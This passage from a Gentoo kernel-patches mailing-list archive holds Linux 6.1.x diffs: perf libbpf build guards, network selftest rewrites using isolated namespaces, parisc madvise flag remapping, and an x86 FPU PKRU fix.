++			for (j = 0; j < ARRAY_SIZE(slab_legacy_events); j++, i++)
++				rec_argv[i] = strdup(slab_legacy_events[j]);
++		}
+ 	}
+ 	if (kmem_page) {
+ 		rec_argv[i++] = strdup("-g");
+diff --git a/tools/perf/builtin-trace.c b/tools/perf/builtin-trace.c
+index 3dcf6aed1ef71..97b17f8941dc0 100644
+--- a/tools/perf/builtin-trace.c
++++ b/tools/perf/builtin-trace.c
+@@ -17,7 +17,9 @@
+ #include "util/record.h"
+ #include <traceevent/event-parse.h>
+ #include <api/fs/tracing_path.h>
++#ifdef HAVE_LIBBPF_SUPPORT
+ #include <bpf/bpf.h>
++#endif
+ #include "util/bpf_map.h"
+ #include "util/rlimit.h"
+ #include "builtin.h"
+diff --git a/tools/perf/util/auxtrace.c b/tools/perf/util/auxtrace.c
+index 46ada5ec3f9a2..47062f459ccd6 100644
+--- a/tools/perf/util/auxtrace.c
++++ b/tools/perf/util/auxtrace.c
+@@ -2610,7 +2610,7 @@ static int find_dso_sym(struct dso *dso, const char *sym_name, u64 *start,
+ 				*size = sym->start - *start;
+ 			if (idx > 0) {
+ 				if (*size)
+-					return 1;
++					return 0;
+ 			} else if (dso_sym_match(sym, sym_name, &cnt, idx)) {
+ 				print_duplicate_syms(dso, sym_name);
+ 				return -EINVAL;
+diff --git a/tools/perf/util/bpf_counter.h b/tools/perf/util/bpf_counter.h
+index 4dbf26408b692..c6d21c07b14cd 100644
+--- a/tools/perf/util/bpf_counter.h
++++ b/tools/perf/util/bpf_counter.h
+@@ -4,9 +4,12 @@
+ 
+ #include <linux/list.h>
+ #include <sys/resource.h>
++
++#ifdef HAVE_LIBBPF_SUPPORT
+ #include <bpf/bpf.h>
+ #include <bpf/btf.h>
+ #include <bpf/libbpf.h>
++#endif
+ 
+ struct evsel;
+ struct target;
+@@ -87,6 +90,8 @@ static inline void set_max_rlimit(void)
+ 	setrlimit(RLIMIT_MEMLOCK, &rinf);
+ }
+ 
++#ifdef HAVE_BPF_SKEL
++
+ static inline __u32 bpf_link_get_id(int fd)
+ {
+ 	struct bpf_link_info link_info = { .id = 0, };
+@@ -127,5 +132,6 @@ static inline int bperf_trigger_reading(int prog_fd, int cpu)
+ 
+ 	return bpf_prog_test_run_opts(prog_fd, &opts);
+ }
++#endif /* HAVE_BPF_SKEL */
+ 
+ #endif /* __PERF_BPF_COUNTER_H */
+diff --git a/tools/testing/memblock/internal.h b/tools/testing/memblock/internal.h
+index fdb7f5db73082..85973e55489e7 100644
+--- a/tools/testing/memblock/internal.h
++++ b/tools/testing/memblock/internal.h
+@@ -15,6 +15,10 @@ bool mirrored_kernelcore = false;
+ 
+ struct page {};
+ 
++void __free_pages_core(struct page *page, unsigned int order)
++{
++}
++
+ void memblock_free_pages(struct page *page, unsigned long pfn,
+ 			 unsigned int order)
+ {
+diff --git a/tools/testing/selftests/net/af_unix/test_unix_oob.c b/tools/testing/selftests/net/af_unix/test_unix_oob.c
+index b57e91e1c3f28..532459a15067c 100644
+--- a/tools/testing/selftests/net/af_unix/test_unix_oob.c
++++ b/tools/testing/selftests/net/af_unix/test_unix_oob.c
+@@ -124,7 +124,7 @@ void producer(struct sockaddr_un *consumer_addr)
+ 
+ 	wait_for_signal(pipefd[0]);
+ 	if (connect(cfd, (struct sockaddr *)consumer_addr,
+-		     sizeof(struct sockaddr)) != 0) {
++		     sizeof(*consumer_addr)) != 0) {
+ 		perror("Connect failed");
+ 		kill(0, SIGTERM);
+ 		exit(1);
+diff --git a/tools/testing/selftests/net/l2_tos_ttl_inherit.sh b/tools/testing/selftests/net/l2_tos_ttl_inherit.sh
+index dca1e6f777a89..f11756e7df2f9 100755
+--- a/tools/testing/selftests/net/l2_tos_ttl_inherit.sh
++++ b/tools/testing/selftests/net/l2_tos_ttl_inherit.sh
+@@ -12,19 +12,27 @@
+ # In addition this script also checks if forcing a specific field in the
+ # outer header is working.
+ 
++# Return 4 by default (Kselftest SKIP code)
++ERR=4
++
+ if [ "$(id -u)" != "0" ]; then
+ 	echo "Please run as root."
+-	exit 0
++	exit $ERR
+ fi
+ if ! which tcpdump > /dev/null 2>&1; then
+ 	echo "No tcpdump found. Required for this test."
+-	exit 0
++	exit $ERR
+ fi
+ 
+ expected_tos="0x00"
+ expected_ttl="0"
+ failed=false
+ 
++readonly NS0=$(mktemp -u ns0-XXXXXXXX)
++readonly NS1=$(mktemp -u ns1-XXXXXXXX)
++
++RUN_NS0="ip netns exec ${NS0}"
++
+ get_random_tos() {
+ 	# Get a random hex tos value between 0x00 and 0xfc, a multiple of 4
+ 	echo "0x$(tr -dc '0-9a-f' < /dev/urandom | head -c 1)\
+@@ -61,7 +69,6 @@ setup() {
+ 	local vlan="$5"
+ 	local test_tos="0x00"
+ 	local test_ttl="0"
+-	local ns="ip netns exec testing"
+ 
+ 	# We don't want a test-tos of 0x00,
+ 	# because this is the value that we get when no tos is set.
+@@ -94,14 +101,15 @@ setup() {
+ 	printf "│%7s │%6s │%6s │%13s │%13s │%6s │" \
+ 	"$type" "$outer" "$inner" "$tos" "$ttl" "$vlan"
+ 
+-	# Create 'testing' netns, veth pair and connect main ns with testing ns
+-	ip netns add testing
+-	ip link add type veth
+-	ip link set veth1 netns testing
+-	ip link set veth0 up
+-	$ns ip link set veth1 up
+-	ip addr flush dev veth0
+-	$ns ip addr flush dev veth1
++	# Create netns NS0 and NS1 and connect them with a veth pair
++	ip netns add "${NS0}"
++	ip netns add "${NS1}"
++	ip link add name veth0 netns "${NS0}" type veth \
++		peer name veth1 netns "${NS1}"
++	ip -netns "${NS0}" link set dev veth0 up
++	ip -netns "${NS1}" link set dev veth1 up
++	ip -netns "${NS0}" address flush dev veth0
++	ip -netns "${NS1}" address flush dev veth1
+ 
+ 	local local_addr1=""
+ 	local local_addr2=""
+@@ -127,51 +135,59 @@ setup() {
+ 		if [ "$type" = "gre" ]; then
+ 			type="gretap"
+ 		fi
+-		ip addr add 198.18.0.1/24 dev veth0
+-		$ns ip addr add 198.18.0.2/24 dev veth1
+-		ip link add name tep0 type $type $local_addr1 remote \
+-		198.18.0.2 tos $test_tos ttl $test_ttl $vxlan $geneve
+-		$ns ip link add name tep1 type $type $local_addr2 remote \
+-		198.18.0.1 tos $test_tos ttl $test_ttl $vxlan $geneve
++		ip -netns "${NS0}" address add 198.18.0.1/24 dev veth0
++		ip -netns "${NS1}" address add 198.18.0.2/24 dev veth1
++		ip -netns "${NS0}" link add name tep0 type $type $local_addr1 \
++			remote 198.18.0.2 tos $test_tos ttl $test_ttl         \
++			$vxlan $geneve
++		ip -netns "${NS1}" link add name tep1 type $type $local_addr2 \
++			remote 198.18.0.1 tos $test_tos ttl $test_ttl         \
++			$vxlan $geneve
+ 	elif [ "$outer" = "6" ]; then
+ 		if [ "$type" = "gre" ]; then
+ 			type="ip6gretap"
+ 		fi
+-		ip addr add fdd1:ced0:5d88:3fce::1/64 dev veth0
+-		$ns ip addr add fdd1:ced0:5d88:3fce::2/64 dev veth1
+-		ip link add name tep0 type $type $local_addr1 \
+-		remote fdd1:ced0:5d88:3fce::2 tos $test_tos ttl $test_ttl \
+-		$vxlan $geneve
+-		$ns ip link add name tep1 type $type $local_addr2 \
+-		remote fdd1:ced0:5d88:3fce::1 tos $test_tos ttl $test_ttl \
+-		$vxlan $geneve
++		ip -netns "${NS0}" address add fdd1:ced0:5d88:3fce::1/64 \
++			dev veth0 nodad
++		ip -netns "${NS1}" address add fdd1:ced0:5d88:3fce::2/64 \
++			dev veth1 nodad
++		ip -netns "${NS0}" link add name tep0 type $type $local_addr1 \
++			remote fdd1:ced0:5d88:3fce::2 tos $test_tos           \
++			ttl $test_ttl $vxlan $geneve
++		ip -netns "${NS1}" link add name tep1 type $type $local_addr2 \
++			remote fdd1:ced0:5d88:3fce::1 tos $test_tos           \
++			ttl $test_ttl $vxlan $geneve
+ 	fi
+ 
+ 	# Bring L2-tunnel link up and create VLAN on top
+-	ip link set tep0 up
+-	$ns ip link set tep1 up
+-	ip addr flush dev tep0
+-	$ns ip addr flush dev tep1
++	ip -netns "${NS0}" link set tep0 up
++	ip -netns "${NS1}" link set tep1 up
++	ip -netns "${NS0}" address flush dev tep0
++	ip -netns "${NS1}" address flush dev tep1
+ 	local parent
+ 	if $vlan; then
+ 		parent="vlan99-"
+-		ip link add link tep0 name ${parent}0 type vlan id 99
+-		$ns ip link add link tep1 name ${parent}1 type vlan id 99
+-		ip link set ${parent}0 up
+-		$ns ip link set ${parent}1 up
+-		ip addr flush dev ${parent}0
+-		$ns ip addr flush dev ${parent}1
++		ip -netns "${NS0}" link add link tep0 name ${parent}0 \
++			type vlan id 99
++		ip -netns "${NS1}" link add link tep1 name ${parent}1 \
++			type vlan id 99
++		ip -netns "${NS0}" link set dev ${parent}0 up
++		ip -netns "${NS1}" link set dev ${parent}1 up
++		ip -netns "${NS0}" address flush dev ${parent}0
++		ip -netns "${NS1}" address flush dev ${parent}1
+ 	else
+ 		parent="tep"
+ 	fi
+ 
+ 	# Assign inner IPv4/IPv6 addresses
+ 	if [ "$inner" = "4" ] || [ "$inner" = "other" ]; then
+-		ip addr add 198.19.0.1/24 brd + dev ${parent}0
+-		$ns ip addr add 198.19.0.2/24 brd + dev ${parent}1
++		ip -netns "${NS0}" address add 198.19.0.1/24 brd + dev ${parent}0
++		ip -netns "${NS1}" address add 198.19.0.2/24 brd + dev ${parent}1
+ 	elif [ "$inner" = "6" ]; then
+-		ip addr add fdd4:96cf:4eae:443b::1/64 dev ${parent}0
+-		$ns ip addr add fdd4:96cf:4eae:443b::2/64 dev ${parent}1
++		ip -netns "${NS0}" address add fdd4:96cf:4eae:443b::1/64 \
++			dev ${parent}0 nodad
++		ip -netns "${NS1}" address add fdd4:96cf:4eae:443b::2/64 \
++			dev ${parent}1 nodad
+ 	fi
+ }
+ 
+@@ -192,10 +208,10 @@ verify() {
+ 		ping_dst="198.19.0.3" # Generates ARPs which are not IPv4/IPv6
+ 	fi
+ 	if [ "$tos_ttl" = "inherit" ]; then
+-		ping -i 0.1 $ping_dst -Q "$expected_tos" -t "$expected_ttl" \
+-		2>/dev/null 1>&2 & ping_pid="$!"
++		${RUN_NS0} ping -i 0.1 $ping_dst -Q "$expected_tos"          \
++			 -t "$expected_ttl" 2>/dev/null 1>&2 & ping_pid="$!"
+ 	else
+-		ping -i 0.1 $ping_dst 2>/dev/null 1>&2 & ping_pid="$!"
++		${RUN_NS0} ping -i 0.1 $ping_dst 2>/dev/null 1>&2 & ping_pid="$!"
+ 	fi
+ 	local tunnel_type_offset tunnel_type_proto req_proto_offset req_offset
+ 	if [ "$type" = "gre" ]; then
+@@ -216,10 +232,12 @@ verify() {
+ 				req_proto_offset="$((req_proto_offset + 4))"
+ 				req_offset="$((req_offset + 4))"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip[$req_proto_offset] = 0x01 and \
+-			ip[$req_offset] = 0x08 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip[$req_proto_offset] = 0x01 and              \
++				ip[$req_offset] = 0x08 2>/dev/null            \
++				| head -n 1)"
+ 		elif [ "$inner" = "6" ]; then
+ 			req_proto_offset="44"
+ 			req_offset="78"
+@@ -231,10 +249,12 @@ verify() {
+ 				req_proto_offset="$((req_proto_offset + 4))"
+ 				req_offset="$((req_offset + 4))"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip[$req_proto_offset] = 0x3a and \
+-			ip[$req_offset] = 0x80 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip[$req_proto_offset] = 0x3a and              \
++				ip[$req_offset] = 0x80 2>/dev/null            \
++				| head -n 1)"
+ 		elif [ "$inner" = "other" ]; then
+ 			req_proto_offset="36"
+ 			req_offset="45"
+@@ -250,11 +270,13 @@ verify() {
+ 				expected_tos="0x00"
+ 				expected_ttl="64"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip[$req_proto_offset] = 0x08 and \
+-			ip[$((req_proto_offset + 1))] = 0x06 and \
+-			ip[$req_offset] = 0x01 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip[$req_proto_offset] = 0x08 and              \
++				ip[$((req_proto_offset + 1))] = 0x06 and      \
++				ip[$req_offset] = 0x01 2>/dev/null            \
++				| head -n 1)"
+ 		fi
+ 	elif [ "$outer" = "6" ]; then
+ 		if [ "$type" = "gre" ]; then
+@@ -273,10 +295,12 @@ verify() {
+ 				req_proto_offset="$((req_proto_offset + 4))"
+ 				req_offset="$((req_offset + 4))"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip6[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip6[$req_proto_offset] = 0x01 and \
+-			ip6[$req_offset] = 0x08 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip6[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip6[$req_proto_offset] = 0x01 and             \
++				ip6[$req_offset] = 0x08 2>/dev/null           \
++				| head -n 1)"
+ 		elif [ "$inner" = "6" ]; then
+ 			local req_proto_offset="72"
+ 			local req_offset="106"
+@@ -288,10 +312,12 @@ verify() {
+ 				req_proto_offset="$((req_proto_offset + 4))"
+ 				req_offset="$((req_offset + 4))"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip6[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip6[$req_proto_offset] = 0x3a and \
+-			ip6[$req_offset] = 0x80 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip6[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip6[$req_proto_offset] = 0x3a and             \
++				ip6[$req_offset] = 0x80 2>/dev/null           \
++				| head -n 1)"
+ 		elif [ "$inner" = "other" ]; then
+ 			local req_proto_offset="64"
+ 			local req_offset="73"
+@@ -307,15 +333,17 @@ verify() {
+ 				expected_tos="0x00"
+ 				expected_ttl="64"
+ 			fi
+-			out="$(tcpdump --immediate-mode -p -c 1 -v -i veth0 -n \
+-			ip6[$tunnel_type_offset] = $tunnel_type_proto and \
+-			ip6[$req_proto_offset] = 0x08 and \
+-			ip6[$((req_proto_offset + 1))] = 0x06 and \
+-			ip6[$req_offset] = 0x01 2>/dev/null | head -n 1)"
++			out="$(${RUN_NS0} tcpdump --immediate-mode -p -c 1 -v \
++				-i veth0 -n                                   \
++				ip6[$tunnel_type_offset] = $tunnel_type_proto and \
++				ip6[$req_proto_offset] = 0x08 and             \
++				ip6[$((req_proto_offset + 1))] = 0x06 and     \
++				ip6[$req_offset] = 0x01 2>/dev/null           \
++				| head -n 1)"
+ 		fi
+ 	fi
+ 	kill -9 $ping_pid
+-	wait $ping_pid 2>/dev/null
++	wait $ping_pid 2>/dev/null || true
+ 	result="FAIL"
+ 	if [ "$outer" = "4" ]; then
+ 		captured_ttl="$(get_field "ttl" "$out")"
+@@ -351,11 +379,35 @@ verify() {
+ }
+ 
+ cleanup() {
+-	ip link del veth0 2>/dev/null
+-	ip netns del testing 2>/dev/null
+-	ip link del tep0 2>/dev/null
++	ip netns del "${NS0}" 2>/dev/null
++	ip netns del "${NS1}" 2>/dev/null
+ }
+ 
++exit_handler() {
++	# Don't exit immediately if one of the intermediate commands fails.
++	# We might be called at the end of the script, when the network
++	# namespaces have already been deleted. So cleanup() may fail, but we
++	# still need to run until 'exit $ERR' or the script won't return the
++	# correct error code.
++	set +e
++
++	cleanup
++
++	exit $ERR
++}
++
++# Restore the default SIGINT handler (just in case) and exit.
++# The exit handler will take care of cleaning everything up.
++interrupted() {
++	trap - INT
++
++	exit $ERR
++}
++
++set -e
++trap exit_handler EXIT
++trap interrupted INT
++
+ printf "┌────────┬───────┬───────┬──────────────┬"
+ printf "──────────────┬───────┬────────┐\n"
+ for type in gre vxlan geneve; do
+@@ -385,6 +437,10 @@ done
+ printf "└────────┴───────┴───────┴──────────────┴"
+ printf "──────────────┴───────┴────────┘\n"
+ 
++# All tests done.
++# Set ERR appropriately: it will be returned by the exit handler.
+ if $failed; then
+-	exit 1
++	ERR=1
++else
++	ERR=0
+ fi
+diff --git a/tools/testing/selftests/netfilter/nft_trans_stress.sh b/tools/testing/selftests/netfilter/nft_trans_stress.sh
+index a7f62ad4f6611..2ffba45a78bf4 100755
+--- a/tools/testing/selftests/netfilter/nft_trans_stress.sh
++++ b/tools/testing/selftests/netfilter/nft_trans_stress.sh
+@@ -10,12 +10,20 @@
+ ksft_skip=4
+ 
+ testns=testns-$(mktemp -u "XXXXXXXX")
++tmp=""
+ 
+ tables="foo bar baz quux"
+ global_ret=0
+ eret=0
+ lret=0
+ 
++cleanup() {
++	ip netns pids "$testns" | xargs kill 2>/dev/null
++	ip netns del "$testns"
++
++	rm -f "$tmp"
++}
++
+ check_result()
+ {
+ 	local r=$1
+@@ -43,6 +51,7 @@ if [ $? -ne 0 ];then
+ 	exit $ksft_skip
+ fi
+ 
++trap cleanup EXIT
+ tmp=$(mktemp)
+ 
+ for table in $tables; do
+@@ -139,11 +148,4 @@ done
+ 
+ check_result $lret "add/delete with nftrace enabled"
+ 
+-pkill -9 ping
+-
+-wait
+-
+-rm -f "$tmp"
+-ip netns del "$testns"
+-
+ exit $global_ret
+diff --git a/tools/testing/selftests/netfilter/settings b/tools/testing/selftests/netfilter/settings
+new file mode 100644
+index 0000000000000..6091b45d226ba
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/settings
+@@ -0,0 +1 @@
++timeout=120


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-14 13:48 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-14 13:48 UTC (permalink / raw
  To: gentoo-commits

commit:     5018f7dec55afd5e3c786f4a2b0c2977ec6ead0c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Jan 14 13:48:30 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Jan 14 13:48:30 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5018f7de

Linux patch 6.1.6

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |   4 +
 1005_linux-6.1.6.patch | 861 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 865 insertions(+)

diff --git a/0000_README b/0000_README
index f47a205a..9e9a8d04 100644
--- a/0000_README
+++ b/0000_README
@@ -63,6 +63,10 @@ Patch:  1004_linux-6.1.5.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.5
 
+Patch:  1005_linux-6.1.6.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.6
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1005_linux-6.1.6.patch b/1005_linux-6.1.6.patch
new file mode 100644
index 00000000..ad3754e5
--- /dev/null
+++ b/1005_linux-6.1.6.patch
@@ -0,0 +1,861 @@
+diff --git a/Makefile b/Makefile
+index ddbd2fc917c59..19e8c6dec6e54 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 5
++SUBLEVEL = 6
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/parisc/include/uapi/asm/mman.h b/arch/parisc/include/uapi/asm/mman.h
+index 22133a6a506ef..68c44f99bc931 100644
+--- a/arch/parisc/include/uapi/asm/mman.h
++++ b/arch/parisc/include/uapi/asm/mman.h
+@@ -49,6 +49,19 @@
+ #define MADV_DONTFORK	10		/* don't inherit across fork */
+ #define MADV_DOFORK	11		/* do inherit across fork */
+ 
++#define MADV_MERGEABLE   12		/* KSM may merge identical pages */
++#define MADV_UNMERGEABLE 13		/* KSM may not merge identical pages */
++
++#define MADV_HUGEPAGE	14		/* Worth backing with hugepages */
++#define MADV_NOHUGEPAGE 15		/* Not worth backing with hugepages */
++
++#define MADV_DONTDUMP   16		/* Explicity exclude from the core dump,
++					   overrides the coredump filter bits */
++#define MADV_DODUMP	17		/* Clear the MADV_NODUMP flag */
++
++#define MADV_WIPEONFORK 18		/* Zero memory on fork, child only */
++#define MADV_KEEPONFORK 19		/* Undo MADV_WIPEONFORK */
++
+ #define MADV_COLD	20		/* deactivate these pages */
+ #define MADV_PAGEOUT	21		/* reclaim these pages */
+ 
+@@ -57,27 +70,13 @@
+ 
+ #define MADV_DONTNEED_LOCKED	24	/* like DONTNEED, but drop locked pages too */
+ 
+-#define MADV_MERGEABLE   65		/* KSM may merge identical pages */
+-#define MADV_UNMERGEABLE 66		/* KSM may not merge identical pages */
+-
+-#define MADV_HUGEPAGE	67		/* Worth backing with hugepages */
+-#define MADV_NOHUGEPAGE	68		/* Not worth backing with hugepages */
+-
+-#define MADV_DONTDUMP   69		/* Explicity exclude from the core dump,
+-					   overrides the coredump filter bits */
+-#define MADV_DODUMP	70		/* Clear the MADV_NODUMP flag */
+-
+-#define MADV_WIPEONFORK 71		/* Zero memory on fork, child only */
+-#define MADV_KEEPONFORK 72		/* Undo MADV_WIPEONFORK */
+-
+-#define MADV_COLLAPSE	73		/* Synchronous hugepage collapse */
++#define MADV_COLLAPSE	25		/* Synchronous hugepage collapse */
+ 
+ #define MADV_HWPOISON     100		/* poison a page for testing */
+ #define MADV_SOFT_OFFLINE 101		/* soft offline page for testing */
+ 
+ /* compatibility flags */
+ #define MAP_FILE	0
+-#define MAP_VARIABLE	0
+ 
+ #define PKEY_DISABLE_ACCESS	0x1
+ #define PKEY_DISABLE_WRITE	0x2
+diff --git a/arch/parisc/kernel/sys_parisc.c b/arch/parisc/kernel/sys_parisc.c
+index 848b0702005d6..09a34b07f02e6 100644
+--- a/arch/parisc/kernel/sys_parisc.c
++++ b/arch/parisc/kernel/sys_parisc.c
+@@ -465,3 +465,31 @@ asmlinkage long parisc_inotify_init1(int flags)
+ 	flags = FIX_O_NONBLOCK(flags);
+ 	return sys_inotify_init1(flags);
+ }
++
++/*
++ * madvise() wrapper
++ *
++ * Up to kernel v6.1 parisc has different values than all other
++ * platforms for the MADV_xxx flags listed below.
++ * To keep binary compatibility with existing userspace programs
++ * translate the former values to the new values.
++ *
++ * XXX: Remove this wrapper in year 2025 (or later)
++ */
++
++asmlinkage notrace long parisc_madvise(unsigned long start, size_t len_in, int behavior)
++{
++	switch (behavior) {
++	case 65: behavior = MADV_MERGEABLE;	break;
++	case 66: behavior = MADV_UNMERGEABLE;	break;
++	case 67: behavior = MADV_HUGEPAGE;	break;
++	case 68: behavior = MADV_NOHUGEPAGE;	break;
++	case 69: behavior = MADV_DONTDUMP;	break;
++	case 70: behavior = MADV_DODUMP;	break;
++	case 71: behavior = MADV_WIPEONFORK;	break;
++	case 72: behavior = MADV_KEEPONFORK;	break;
++	case 73: behavior = MADV_COLLAPSE;	break;
++	}
++
++	return sys_madvise(start, len_in, behavior);
++}
+diff --git a/arch/parisc/kernel/syscalls/syscall.tbl b/arch/parisc/kernel/syscalls/syscall.tbl
+index 8a99c998da9bb..0e42fceb2d5e2 100644
+--- a/arch/parisc/kernel/syscalls/syscall.tbl
++++ b/arch/parisc/kernel/syscalls/syscall.tbl
+@@ -131,7 +131,7 @@
+ 116	common	sysinfo			sys_sysinfo			compat_sys_sysinfo
+ 117	common	shutdown		sys_shutdown
+ 118	common	fsync			sys_fsync
+-119	common	madvise			sys_madvise
++119	common	madvise			parisc_madvise
+ 120	common	clone			sys_clone_wrapper
+ 121	common	setdomainname		sys_setdomainname
+ 122	common	sendfile		sys_sendfile			compat_sys_sendfile
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index d00db56a88682..9baa89a8877d0 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -391,8 +391,6 @@ int fpu_copy_uabi_to_guest_fpstate(struct fpu_guest *gfpu, const void *buf,
+ {
+ 	struct fpstate *kstate = gfpu->fpstate;
+ 	const union fpregs_state *ustate = buf;
+-	struct pkru_state *xpkru;
+-	int ret;
+ 
+ 	if (!cpu_feature_enabled(X86_FEATURE_XSAVE)) {
+ 		if (ustate->xsave.header.xfeatures & ~XFEATURE_MASK_FPSSE)
+@@ -406,16 +404,15 @@ int fpu_copy_uabi_to_guest_fpstate(struct fpu_guest *gfpu, const void *buf,
+ 	if (ustate->xsave.header.xfeatures & ~xcr0)
+ 		return -EINVAL;
+ 
+-	ret = copy_uabi_from_kernel_to_xstate(kstate, ustate);
+-	if (ret)
+-		return ret;
++	/*
++	 * Nullify @vpkru to preserve its current value if PKRU's bit isn't set
++	 * in the header.  KVM's odd ABI is to leave PKRU untouched in this
++	 * case (all other components are eventually re-initialized).
++	 */
++	if (!(ustate->xsave.header.xfeatures & XFEATURE_MASK_PKRU))
++		vpkru = NULL;
+ 
+-	/* Retrieve PKRU if not in init state */
+-	if (kstate->regs.xsave.header.xfeatures & XFEATURE_MASK_PKRU) {
+-		xpkru = get_xsave_addr(&kstate->regs.xsave, XFEATURE_PKRU);
+-		*vpkru = xpkru->pkru;
+-	}
+-	return 0;
++	return copy_uabi_from_kernel_to_xstate(kstate, ustate, vpkru);
+ }
+ EXPORT_SYMBOL_GPL(fpu_copy_uabi_to_guest_fpstate);
+ #endif /* CONFIG_KVM */
+diff --git a/arch/x86/kernel/fpu/regset.c b/arch/x86/kernel/fpu/regset.c
+index 75ffaef8c2991..6d056b68f4ed7 100644
+--- a/arch/x86/kernel/fpu/regset.c
++++ b/arch/x86/kernel/fpu/regset.c
+@@ -167,7 +167,7 @@ int xstateregs_set(struct task_struct *target, const struct user_regset *regset,
+ 	}
+ 
+ 	fpu_force_restore(fpu);
+-	ret = copy_uabi_from_kernel_to_xstate(fpu->fpstate, kbuf ?: tmpbuf);
++	ret = copy_uabi_from_kernel_to_xstate(fpu->fpstate, kbuf ?: tmpbuf, &target->thread.pkru);
+ 
+ out:
+ 	vfree(tmpbuf);
+diff --git a/arch/x86/kernel/fpu/signal.c b/arch/x86/kernel/fpu/signal.c
+index 91d4b6de58abe..558076dbde5bf 100644
+--- a/arch/x86/kernel/fpu/signal.c
++++ b/arch/x86/kernel/fpu/signal.c
+@@ -396,7 +396,7 @@ static bool __fpu_restore_sig(void __user *buf, void __user *buf_fx,
+ 
+ 	fpregs = &fpu->fpstate->regs;
+ 	if (use_xsave() && !fx_only) {
+-		if (copy_sigframe_from_user_to_xstate(fpu->fpstate, buf_fx))
++		if (copy_sigframe_from_user_to_xstate(tsk, buf_fx))
+ 			return false;
+ 	} else {
+ 		if (__copy_from_user(&fpregs->fxsave, buf_fx,
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index c2dde46a538e7..714166cc25f2f 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -1200,8 +1200,36 @@ static int copy_from_buffer(void *dst, unsigned int offset, unsigned int size,
+ }
+ 
+ 
++/**
++ * copy_uabi_to_xstate - Copy a UABI format buffer to the kernel xstate
++ * @fpstate:	The fpstate buffer to copy to
++ * @kbuf:	The UABI format buffer, if it comes from the kernel
++ * @ubuf:	The UABI format buffer, if it comes from userspace
++ * @pkru:	The location to write the PKRU value to
++ *
++ * Converts from the UABI format into the kernel internal hardware
++ * dependent format.
++ *
++ * This function ultimately has three different callers with distinct PKRU
++ * behavior.
++ * 1.	When called from sigreturn the PKRU register will be restored from
++ *	@fpstate via an XRSTOR. Correctly copying the UABI format buffer to
++ *	@fpstate is sufficient to cover this case, but the caller will also
++ *	pass a pointer to the thread_struct's pkru field in @pkru and updating
++ *	it is harmless.
++ * 2.	When called from ptrace the PKRU register will be restored from the
++ *	thread_struct's pkru field. A pointer to that is passed in @pkru.
++ *	The kernel will restore it manually, so the XRSTOR behavior that resets
++ *	the PKRU register to the hardware init value (0) if the corresponding
++ *	xfeatures bit is not set is emulated here.
++ * 3.	When called from KVM the PKRU register will be restored from the vcpu's
++ *	pkru field. A pointer to that is passed in @pkru. KVM hasn't used
++ *	XRSTOR and hasn't had the PKRU resetting behavior described above. To
++ *	preserve that KVM behavior, it passes NULL for @pkru if the xfeatures
++ *	bit is not set.
++ */
+ static int copy_uabi_to_xstate(struct fpstate *fpstate, const void *kbuf,
+-			       const void __user *ubuf)
++			       const void __user *ubuf, u32 *pkru)
+ {
+ 	struct xregs_state *xsave = &fpstate->regs.xsave;
+ 	unsigned int offset, size;
+@@ -1250,6 +1278,20 @@ static int copy_uabi_to_xstate(struct fpstate *fpstate, const void *kbuf,
+ 		}
+ 	}
+ 
++	if (hdr.xfeatures & XFEATURE_MASK_PKRU) {
